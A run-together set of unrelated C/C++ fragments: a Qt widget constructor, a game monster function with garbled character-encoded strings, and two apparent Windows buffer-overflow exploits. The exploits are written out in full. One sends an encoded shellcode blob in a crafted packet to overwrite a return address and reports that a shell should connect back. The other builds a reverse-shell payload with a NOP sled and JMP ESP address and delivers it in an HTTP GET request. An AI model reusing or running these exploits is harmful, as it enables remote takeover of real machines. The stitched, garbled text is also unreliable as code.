TakeOf::TakeOf(QWidget *parent) : AbstractCentWid(parent) { setObjectName("Take-Off"); lc=new ListCollection; lc->append(new CommonList("Les Vols Prets",new TousVol)); set_lc(lc); _fly=new Fly(); connect(_fly,SIGNAL(doneVol()),this,SLOT(setModel())); sc=new OneATimeShowCollection(_fly); DropReceiver *dr=new DropReceiver(sc,true); set_sc(sc); add_dr(dr); lay(); }
bool CMonster::ReplaceSoul(const MonsterInfo &info, bool boss) { bBoss = boss; id = info.ID; name = info.name; set_head(info.Head); set_Lv(info.level); set_exp(info.exp); set_hp_m(info.hp); set_mp_m(info.mp); set_dc(info.DC1, info.DC2); set_mc(info.MC1, info.MC2); set_sc(0, 0); set_ac(info.AC, info.AC); set_mac(info.MAC, info.MAC); set_intervel(info.interval); QString str[10] = { QStringLiteral("ÆË»÷"), QStringLiteral("³åײ"), QStringLiteral("¿ÖÏÅ"), QStringLiteral("·É»÷"), QStringLiteral("Ó°»÷"), QStringLiteral("¶¾Êõ"), QStringLiteral("´ÎÉù²¨"), QStringLiteral("¼«ËÙ"), QStringLiteral("¾ÞÁ¦"), QStringLiteral("¼ṳ̀") }; skill.name = str[qrand() % 10]; return true; }
int start_auth(int sock, char *rhost, int rport) { int size,i=4,os,sp; char buffer[SIZEOF]; char shellc0de[] = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef" "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95" "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e" "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad" "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d" "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96" "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3" "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3" "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae" "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd" "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6" "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8" "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd" "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e" "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52" "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3" "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff" "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95" "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0" "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97" "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a" "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a" "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d" "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52" "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c" "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4" "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0" "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc" "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a"; size=recv(sock,buffer,SIZEOF,0); if(buffer[0]!=0x30||buffer[1]!=0x11) { printf("error: wrong data received\r\n"); return -1; } buffer[28]=0x00;buffer[36]=0x01; send(sock,buffer,size,0); memset(buffer,0,SIZEOF); printf("[+] Gathering %-30s ...","information"); for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0)); if(buffer[0]!=0x10||buffer[1]!=0x27) { printf("error: wrong data received\r\n"); return -1; } printf("Done\r\n"); sp=(unsigned int)buffer[37]; printf("[i] Operating system : "); if(buffer[16]==0x28||buffer[17]==0x0a) { os=1; printf("WinXP"); } else { printf("Win2000"); os=0; } printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]); printf("[+] Setting shellc0de for this %-15s ...","version"); set_sc(os,sp,rhost,rport,shellc0de); memset(&buffer[2],0,SIZEOF-2); strcpy(&buffer[175],WINUSER); memset(&buffer[416],0x90,180); if(os==0) memcpy(&buffer[516],RET,4); else memcpy(&buffer[516],RET_XP,4); memcpy(&buffer[520],shellc0de,sizeof(shellc0de)); strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME); strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE); strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST); strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN); strcpy(&buffer[2795],CLIENT_VERSION); printf("Done\r\n"); printf("[+] Sending evil %-30s ...","packet"); send(sock,buffer,SIZEOF,0); memset(buffer,0,SIZEOF); size=recv(sock,buffer,SIZEOF,0); if(buffer[0]!=0x32||buffer[1]!=0x11) { printf("Patched\r\n"); return -1; } printf("Done\r\n"); printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport); return 0; }
int main(int argc, char *argv[]) { int hsocket; struct hostent *host; struct in_addr adresseIP; struct sockaddr_in adressesocket; char BadString[700],Request[800]; int i,len,cible=0; #ifdef _WIN32 WSADATA wsaData; #endif if(argc<4) { usage(argv[0]); } if(argc>4) { cible=atoi(argv[4]); } banner(); #ifdef _WIN32 if(WSAStartup(0x101,&wsaData)) { printf("[-] Unable to load winsock\n"); exit (-1); } else { printf("[+] Winsock loaded\n"); } #endif //Cr?ation de la socket if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1) { printf("[-] Can't creat Socket\n"); exit (-1); } else { printf("[+] Socket created\n"); } //GetHostByName() if((host=gethostbyname(argv[1]))==0) { printf("[-] Can't acquire remote info\n"); close(hsocket); exit (-1); } else { printf("[+] Remote info Acquired\n"); } memcpy(&adresseIP,host->h_addr,host->h_length); //Preparation de la struct sockaddr_in memset(&adressesocket,0,sizeof(struct sockaddr_in)); adressesocket.sin_family=AF_INET; adressesocket.sin_port=htons(8000); memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length); if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1) { printf("[-] Can't connect on %s:8000\n",argv[1]); close(hsocket); exit (-1); } else { printf("[+] Connected on %s:8000\n",argv[1]); } set_sc(argv[2], atoi(argv[3]),ReversShell); printf("[+] Reverse ShellCode built\n",argv[1]); for(i=0; i<700; i++) { BadString[i]=(char)0x90; } for(i=260; i<623; i++) { BadString[i]=ReversShell[i-260]; } if(cible==0) { memcpy(&BadString[256],JMP_ESP_2K,4); } else { memcpy(&BadString[256],JMP_ESP_XP,4); } BadString[700]=0x00; memset(Request,'\x00',sizeof(Request)); sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1\r\n" "Host: 10.0.0.6:8000\r\n" "\r\n",BadString); printf("[+] BadString constructed\n"); if((len=send(hsocket,Request,strlen(Request),0))==-1) { printf("[-] Error on sending BadString\n"); close(hsocket); exit (-1); } else { printf("[+] BadString Sended (%d)\n",len); } return 0; }